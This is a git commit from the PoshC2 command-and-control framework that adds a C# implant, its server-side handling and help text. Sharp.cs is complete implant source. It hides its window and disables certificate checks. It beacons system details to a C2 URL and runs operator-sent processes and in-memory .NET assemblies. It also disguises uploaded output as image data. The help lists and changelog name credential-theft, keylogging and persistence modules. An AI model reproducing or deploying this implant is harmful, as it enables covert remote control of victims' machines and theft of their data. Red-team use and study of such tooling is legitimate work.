Added CSharp Implant/Dll/Shellcode - More functionality coming soon

chunking
benpturner 2018-12-27 12:10:46 +00:00
parent 971ef58e83
commit 190cb33288
15 changed files with 870 additions and 147 deletions

View File

@ -2,7 +2,7 @@
from DB import * from DB import *
from Config import * from Config import *
import os import os, base64
def check_module_loaded( module_name, randomuri, force=False ): def check_module_loaded( module_name, randomuri, force=False ):
try: try:

View File

@ -125,8 +125,24 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
implant_type = "Daisy" implant_type = "Daisy"
if s.path == ("%s?m" % new_implant_url): if s.path == ("%s?m" % new_implant_url):
implant_type = "OSX" implant_type = "OSX"
if s.path == ("%s?c" % new_implant_url):
implant_type = "C#"
if implant_type == "OSX": if implant_type == "C#":
cookieVal = (s.cookieHeader).replace("SessionID=","")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1])
Domain,User,Hostname,Arch,PID,Proxy = decCookie.split(";")
newImplant = Implant(IPAddress, implant_type, Domain.decode("utf-8"), User.decode("utf-8"), Hostname.decode("utf-8"), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.SharpCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
elif implant_type == "OSX":
cookieVal = (s.cookieHeader).replace("SessionID=","") cookieVal = (s.cookieHeader).replace("SessionID=","")
decCookie = decrypt(KEY, cookieVal) decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1]) IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1])

View File

@ -38,6 +38,10 @@ def load_module(module_name):
file = codecs.open(("%sModules/%s" % (POSHDIR,module_name)), 'r', encoding='utf-8-sig') file = codecs.open(("%sModules/%s" % (POSHDIR,module_name)), 'r', encoding='utf-8-sig')
return file.read() return file.read()
def load_module_sharp(module_name):
file = open(("%sModules/%s" % (POSHDIR,module_name)), 'r+b')
return base64.b64encode(file.read())
def get_images(): def get_images():
dir_path = os.path.dirname(os.path.realpath(__file__)) dir_path = os.path.dirname(os.path.realpath(__file__))
rootimagedir = "%s/Images/" % dir_path rootimagedir = "%s/Images/" % dir_path

506
Files/Sharp.cs Normal file
View File

@ -0,0 +1,506 @@
using System;
using System.Linq;
using System.Net;
using System.Text;
using System.Text.RegularExpressions;
using System.Reflection;
using System.Threading;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.IO;
using System.IO.Compression;
//mono-csc /opt/PoshC2_Python_Git/Files/Sharp.cs -out:/tmp/Sharp.dll -target:library
//cat /tmp/Sharp.dll | base64 -w 0 | xclip
public class Program
{
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public const int SW_HIDE = 0;
public const int SW_SHOW = 5;
public static void Sharp()
{
var handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE);
AllowUntrustedCertificates();
try { primer(); } catch {}
Thread.Sleep(300000);
try { primer(); } catch { }
Thread.Sleep(600000);
try { primer(); } catch { }
}
public static void Main()
{
Sharp();
}
static byte[] Combine(byte[] first, byte[] second)
{
byte[] ret = new byte[first.Length + second.Length];
Buffer.BlockCopy(first, 0, ret, 0, first.Length);
Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
return ret;
}
static System.Net.WebClient GetWebRequest(string cookie)
{
var x = new System.Net.WebClient();
string purl = "#REPLACEPROXYURL#";
string puser = "#REPLACEPROXYUSER#";
string ppass = "#REPLACEPROXYPASSWORD#";
if (!String.IsNullOrEmpty(purl)) {
WebProxy proxy = new WebProxy();
proxy.Address = new Uri(purl);
proxy.Credentials = new NetworkCredential(puser, ppass);
proxy.UseDefaultCredentials = false;
proxy.BypassProxyOnLocal = false;
x.Proxy = proxy;
}
string df = "#REPLACEDF#";
if (!String.IsNullOrEmpty(df)) {
x.Headers.Add("Host",df);
}
x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#");
x.Headers.Add("Referer", "#REPLACEREFERER#");
if (cookie != null)
{
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
}
return x;
}
static string Decryption(string key, string enc)
{
var b = System.Convert.FromBase64String(enc);
Byte[] IV = new Byte[16];
Array.Copy(b, IV, 16);
try {
var a = CAMR(key, System.Convert.ToBase64String(IV));
var d = a.CreateDecryptor();
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
} catch {
var a = CAMA(key, System.Convert.ToBase64String(IV));
var d = a.CreateDecryptor();
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
}
}
static string Encryption(string key, string un, bool comp = false)
{
var b = System.Text.Encoding.UTF8.GetBytes(un);
byte[] byEnc = b;
if (comp){
byEnc = Compress(b);
}
try {
var a = CAMR(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
} catch {
var a = CAMA(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
}
}
static System.Security.Cryptography.AesCryptoServiceProvider CAMA(string key,string IV)
{
System.Security.Cryptography.AesCryptoServiceProvider b = new System.Security.Cryptography.AesCryptoServiceProvider();
b.Mode = System.Security.Cryptography.CipherMode.CBC;
b.Padding = System.Security.Cryptography.PaddingMode.Zeros;
b.BlockSize = 128;
b.KeySize = 256;
if (IV != null)
{
b.IV = System.Convert.FromBase64String(IV);
}
if (key != null)
{
b.Key = System.Convert.FromBase64String(key);
}
return b;
}
static System.Security.Cryptography.RijndaelManaged CAMR(string key,string IV)
{
System.Security.Cryptography.RijndaelManaged a = new System.Security.Cryptography.RijndaelManaged();
a.Mode = System.Security.Cryptography.CipherMode.CBC;
a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
a.BlockSize = 128;
a.KeySize = 256;
if (IV != null)
{
a.IV = System.Convert.FromBase64String(IV);
}
if (key != null)
{
a.Key = System.Convert.FromBase64String(key);
}
return a;
}
static void AllowUntrustedCertificates()
{
try
{
System.Net.ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(delegate { return true; } );
}
catch { }
}
static void primer()
{
DateTime now = DateTime.Now;
DateTime killDate = Convert.ToDateTime("#REPLACEKILLDATE#");
if (killDate < now){
System.Environment.Exit(1);
}
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
var dn = System.Environment.UserDomainName;
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
string o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
string key = "#REPLACEKEY#";
var pp = Encryption(key, o);
string baseURL = "#REPLACEBASEURL#";
string s = "#REPLACESTARTURL#";
var primer = GetWebRequest(pp).DownloadString(s);
var x = Decryption(key, primer);
Regex re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
Match m = re.Match(x);
string RandomURI = m.Groups[1].ToString();
re = new Regex("URLS10484390243(.*)34209348401SLRU");
m = re.Match(x);
string URLS = m.Groups[1].ToString();
re = new Regex("KILLDATE1665(.*)5661ETADLLIK");
m = re.Match(x);
var KillDate = m.Groups[1].ToString();
re = new Regex("SLEEP98001(.*)10089PEELS");
m = re.Match(x);
var Sleep = m.Groups[1].ToString();
re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
m = re.Match(x);
var NewKey = m.Groups[1].ToString();
re = new Regex("IMGS19459394(.*)49395491SGMI");
m = re.Match(x);
var IMGs = m.Groups[1].ToString();
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
}
static byte[] Compress(byte[] raw)
{
using (MemoryStream memory = new MemoryStream())
{
using (GZipStream gzip = new GZipStream(memory, CompressionMode.Compress, true))
{
gzip.Write(raw, 0, raw.Length);
}
return memory.ToArray();
}
}
static byte[] GetImgData(byte[] cmdoutput, string[] stringnewIMGS)
{
Random rnd = new Random();
string randimg = stringnewIMGS[rnd.Next(stringnewIMGS.Length)];
byte[] imgBytes = System.Convert.FromBase64String(randimg);
var maxByteslen = 1500;
var maxDatalen = 1500 + cmdoutput.Length;
var imageByteslen = imgBytes.Length;
var paddingByteslen = maxByteslen - imageByteslen;
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(paddingByteslen)));
var ImageBytesFull = new byte[maxDatalen];
System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length);
System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length);
System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length);
return ImageBytesFull;
}
static Random random = new Random();
static string RandomString(int length)
{
const string chars = "...................@..........................Tyscf";
return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray());
}
static Type LoadSomething(string assemblyQualifiedName)
{
// Throws exception is type was not found
return Type.GetType(
assemblyQualifiedName,
(name) =>
{
// Returns the assembly of the type by enumerating loaded assemblies
// in the app domain
return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault();
},
null,
true);
}
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
{
var re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+");
string strURLS = stringURLS.Replace(",","");
var stringnewURLS = re.Matches(strURLS).Cast<Match>().Select(m => m.Value).ToArray();
stringnewURLS = stringnewURLS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
string strIMGS = stringIMGS.Replace(",","");
var stringnewIMGS = re.Matches(strIMGS).Cast<Match>().Select(m => m.Value).ToArray();
stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
int beacontime = 5;
if (!Int32.TryParse(Sleep, out beacontime))
{
beacontime = 5;
}
while(true)
{
Random rnd = new Random();
string URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
string G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
Thread.Sleep(beacontime*1000);
DateTime now = DateTime.Now;
DateTime killDate = Convert.ToDateTime(KillDate);
if (killDate < now){
System.Environment.Exit(1);
}
var cmd = GetWebRequest(null).DownloadString(URL);
string output = "";
try {
string x = "";
try {
x = Decryption(Key, cmd);
x = x.Replace("\0", string.Empty);
} catch {}
using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"C:\temp\log.txt", true))
{
file.WriteLine(x.ToString().TrimEnd());
}
if (x.ToLower().StartsWith("multicmd"))
{
string splitcmd = x.Replace("multicmd","");
string[] split = splitcmd.Split(new string[] {"!d-3dion@LD!-d"}, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
output = "";
//add download-file
//add upload-file
//add implant-core features, screenshot, tasklist, etc
if (c.ToLower() == "pwd") {
output = Directory.GetCurrentDirectory();
}
if (c.ToLower().StartsWith("dir") || c.ToLower().StartsWith("ls")){
string dirPath = "";
var stringOutput = new StringWriter();
Console.SetOut(stringOutput);
if (c.ToLower() == "dir" || c.ToLower() == "ls") {
dirPath = Directory.GetCurrentDirectory();
} else {
dirPath = Regex.Replace(c, "dir ", "", RegexOptions.IgnoreCase);
dirPath = Regex.Replace(c, "ls ", "", RegexOptions.IgnoreCase);
}
Console.WriteLine("Directory listing: {0} \r\n", dirPath);
string[] folderPaths = Directory.GetDirectories(dirPath, "*", SearchOption.TopDirectoryOnly);
foreach (var f in folderPaths)
{
try {
Console.WriteLine("d----- {0}", f.Normalize());
}
catch {}
}
string[] filePaths = Directory.GetFiles(dirPath, "*", SearchOption.TopDirectoryOnly);
foreach (var f in filePaths)
{
try {
Console.WriteLine("------ {0}", f.Normalize());
}
catch {}
}
output = stringOutput.ToString();
}
// load and execute assembly in current app domain
if (c.ToLower().StartsWith("loadmodule")){
//var stringOutput = new StringWriter();
//Console.SetOut(stringOutput);
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
Assembly assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
//var pop = assembly.GetType("Seatbelt.Program").InvokeMember("UserChecks", BindingFlags.InvokeMethod, null, null, null);
//output = stringOutput.ToString();
}
// list loaded assemblies
if (c.ToLower().StartsWith("listmodules")){
var appd = AppDomain.CurrentDomain.GetAssemblies();
foreach (var ass in appd)
{
output += ass.FullName.ToString() + "\n";
}
}
if (c.ToLower() == "ps"){
var loadedType = LoadSomething("ProcHandler, Get-ProcessList, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null");
var xxx = loadedType.Assembly.GetType("ProcHandler").InvokeMember("GetProcesses", BindingFlags.InvokeMethod, null, null, null);
output = xxx.ToString();
}
// run loaded assemblies
if (c.ToLower().StartsWith("run-assembly")){
string[] splitargs = c.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries);
string qualifiedname = splitargs[1];
string name = splitargs[2];
string method = splitargs[3];
var AppDomainAss = AppDomain.CurrentDomain.GetAssemblies();
foreach (var Ass in AppDomainAss)
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var stringOutput = new StringWriter();
Console.SetOut(stringOutput);
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.InvokeMethod, null, null, null);
output = stringOutput.ToString();
}
}
}
// try to load another app domain and unload each time
if (c.ToLower().StartsWith("loadmodule-appdomain")){
var stringOutput = new StringWriter();
Console.SetOut(stringOutput);
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
AppDomain dom = AppDomain.CreateDomain("RANDOM");
Assembly assembly = dom.Load(System.Convert.FromBase64String(module));
var pop = assembly.GetType("Seatbelt.Program").InvokeMember("UserChecks", BindingFlags.InvokeMethod, null, null, null);
output = stringOutput.ToString();
AppDomain.Unload(dom);
}
if (c.ToLower().StartsWith("exit")){
System.Environment.Exit(1);
}
if (c.ToLower().StartsWith("start-process")){
string proc = c.Replace("'", "");
proc = proc.Replace("\"", "");
string pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
string args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
Process p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = pstart;
p.StartInfo.Arguments = args;
p.Start();
output = p.StandardOutput.ReadToEnd();
output = output + p.StandardError.ReadToEnd();
p.WaitForExit();
}
if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon")) {
string beacon = Regex.Replace(c, "setbeacon ", "", RegexOptions.IgnoreCase);
beacon = Regex.Replace(beacon, "beacon ", "", RegexOptions.IgnoreCase);
if (beacon.ToLower().Contains("s"))
{
beacon = Regex.Replace(beacon, "s", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
else if (beacon.ToLower().Contains("m"))
{
beacon = Regex.Replace(beacon, "m", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
}
else if (beacon.ToLower().Contains("h"))
{
beacon = Regex.Replace(beacon, "h", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
beacontime = beacontime * 60;
}
else if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
string task = Encryption(Key, c);
string coutput = Encryption(Key, output, true);
byte[] outputBytes = System.Convert.FromBase64String(coutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
GetWebRequest(task).UploadData(URL, sendBytes);
}
}
} catch (Exception e) {
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
URL = baseURL+"/"+URL+RandomURI;
string task = Encryption(Key, "Error");
string eroutput = Encryption(Key, "Error: " + output + e, true);
byte[] outputBytes = System.Convert.FromBase64String(eroutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
GetWebRequest(task).UploadData(URL, sendBytes);
}
}
}
}

30
Help.py
View File

@ -1,12 +1,12 @@
#!/usr/bin/python #!/usr/bin/python
logopic = """ __________ .__. _________ ________ logopic = """ __________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \ \_______ \____ _____| |__ \_ ___ \ \_____ \\
| ___/ _ \/ ___/ | \ / \ \/ / ____/ | ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \ | | ( <_> )___ \| Y \ \ \____/ \\
|____| \____/____ >___| / \______ /\_______ \ |____| \____/____ >___| / \______ /\_______ \\
\/ \/ \/ \/ \/ \/ \/ \/
=============== v4.5 www.PoshC2.co.uk =============""" =============== v4.6 www.PoshC2.co.uk ============="""
py_help1 = """ py_help1 = """
@ -34,6 +34,26 @@ searchhelp mimikatz
back back
""" """
sharp_help1 = """
Implant Features:
=====================
ps
beacon 60s / beacon 10m / beacon 2h
ls/dir c:\\temp\\
pwd
loadmodule
loadmoduleforce
listmodule
run-assembly ProcHandler Get-ProcessList GetProcesses
start-process net -argumentlist users
kill-implant
hide-implant
unhide-implant
help
searchhelp listmodules
back
"""
posh_help1 = """ posh_help1 = """
Implant Features: Implant Features:
===================== =====================
@ -366,3 +386,5 @@ COMMANDS += ['invoke-psexecproxypayload','invoke-wmiproxypayload', 'invoke-dcomp
COMMANDS += ['invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomdaisypayload'] COMMANDS += ['invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomdaisypayload']
UXCOMMANDS = ["unhide-implant","hide-implant","help","searchhelp","python","loadmodule","loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai","startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant"] UXCOMMANDS = ["unhide-implant","hide-implant","help","searchhelp","python","loadmodule","loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai","startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant"]
SHARPCOMMANDS = ["unhide-implant","ls","pwd","dir","start-process", "hide-implant","help","searchhelp","listmodules","loadmodule","loadmoduleforce","back","ps","beacon","setbeacon","kill-implant"]

View File

@ -31,6 +31,13 @@ class Implant(object):
self.ServerURL = new_serverurl = select_item("HostnameIP", "C2Server") self.ServerURL = new_serverurl = select_item("HostnameIP", "C2Server")
self.AllBeaconURLs = get_otherbeaconurls() self.AllBeaconURLs = get_otherbeaconurls()
self.AllBeaconImages = get_images() self.AllBeaconImages = get_images()
self.SharpCore = """
RANDOMURI19901%s10991IRUMODNAR
URLS10484390243%s34209348401SLRU
KILLDATE1665%s5661ETADLLIK
SLEEP98001%s10089PEELS
NEWKEY8839394%s4939388YEKWEN
IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Key, self.AllBeaconImages)
with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f: with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f:
self.PythonImplant = base64.b64encode(f.read()) self.PythonImplant = base64.b64encode(f.read())
self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random

View File

@ -491,6 +491,67 @@ def runcommand(command, randomuri):
new_task(command, randomuri) new_task(command, randomuri)
return return
elif implant_type == "C#":
if "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpfull = string.split(sharp_help1, '\n')
for line in helpfull:
if searchterm in line:
print (line)
elif "unhide-implant" in command.lower():
unhide_implant(randomuri)
elif "hide-implant" in command.lower():
kill_implant(randomuri)
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print ("Implant not terminated")
if ri == "":
pid = get_pid(randomuri)
new_task("exit",randomuri)
kill_implant(randomuri)
if ri.lower() == "y":
pid = get_pid(randomuri)
new_task("exit" % pid,randomuri)
kill_implant(randomuri)
elif (command.lower() == "ps") or (command.lower() == "ps "):
check_module_loaded("Get-ProcessList.dll", randomuri)
new_task(command,randomuri)
elif "loadmoduleforce" in command.lower():
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, force=True)
elif "loadmodule" in command.lower():
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri)
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
print (sharp_help1)
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
startup()
elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
new_task(command, randomuri)
command = command.replace('set-beacon ', '')
command = command.replace('setbeacon ', '')
command = command.replace('beacon ', '')
update_sleep(command, randomuri)
else:
if command:
new_task(command, randomuri)
return
else: else:
try: try:
check_module_loaded("Implant-Core.ps1", randomuri) check_module_loaded("Implant-Core.ps1", randomuri)
@ -929,6 +990,11 @@ def commandloop(implant_id):
readline.set_completer_delims('\t') readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete") readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter) readline.set_completer(t.listCompleter)
if hostname[15] == 'C#':
t.createListCompleter(SHARPCOMMANDS)
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter)
print (Colours.GREEN) print (Colours.GREEN)
print ("%s @ %s (PID:%s)" % (hostname[11],hostname[3],hostname[8])) print ("%s @ %s (PID:%s)" % (hostname[11],hostname[3],hostname[8]))
command = raw_input("%s> " % (implant_id)) command = raw_input("%s> " % (implant_id))

0
Modules/Cred-Popper.ps1 Executable file → Normal file
View File

2
Modules/Get-Hash.ps1 Executable file → Normal file

File diff suppressed because one or more lines are too long

BIN
Modules/Get-ProcessList.dll Executable file

Binary file not shown.

View File

@ -1,5 +1,13 @@
function SSLInspectionCheck($url, $proxyurl, $proxyuser, $proxypass){ function SSLInspectionCheck($url, $proxyurl, $proxyuser, $proxypass){
$expiration = $null
$certName = $null
$certPublicKeyString = $null
$certSerialNumber = $null
$certThumbprint = $null
$certEffectiveDate = $null
$certIssuer = $null
write-output "Checking $($url)" write-output "Checking $($url)"
$req = [Net.HttpWebRequest]::Create($url) $req = [Net.HttpWebRequest]::Create($url)

BIN
Modules/Seatbelt.exe Executable file

Binary file not shown.

File diff suppressed because one or more lines are too long

View File

@ -35,10 +35,16 @@ def newTask(path):
if a[2].startswith("loadmodule"): if a[2].startswith("loadmodule"):
try: try:
module_name = (a[2]).replace("loadmodule ","") module_name = (a[2]).replace("loadmodule ","")
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name) modulestr = load_module(module_name)
command = "loadmodule%s" % modulestr command = "loadmodule%s" % modulestr
except Exception as e: except Exception as e:
print "Cannot find module, loadmodule is case sensitive!" print "Cannot find module, loadmodule is case sensitive!"
print e
if commands: if commands:
commands += "!d-3dion@LD!-d" + command commands += "!d-3dion@LD!-d" + command
else: else:
@ -47,8 +53,6 @@ def newTask(path):
if commands is not None: if commands is not None:
multicmd = "multicmd%s" % commands multicmd = "multicmd%s" % commands
try: try:
responseVal = encrypt(EncKey, multicmd) responseVal = encrypt(EncKey, multicmd)
except Exception as e: except Exception as e:

View File

@ -1,5 +1,20 @@
4.6 (26/12/18)
==============
Added Sharp Implant and corresponding DLLs/Shellcode
4.5 (19/11/18) 4.5 (19/11/18)
============== ==============
Removed Invoke-Enum
Merged Get-TokenElevationType.ps1 by jmhickman
Added TLS Config to Python Server
Updated README
Updated Get-IPAddress
Merged OfflineReportGenerator.py by skahwah
Updated to latest PowerUp.ps1
Updated INSTALL notes
Updated to work with FIPSAlgorithmPolicy
Updated to latest Invoke-Kerberoast & Invoke-Mimikatz
Removed process start for Netsh.exe on non migrate executable
4.4 (10/11/18) 4.4 (10/11/18)
============== ==============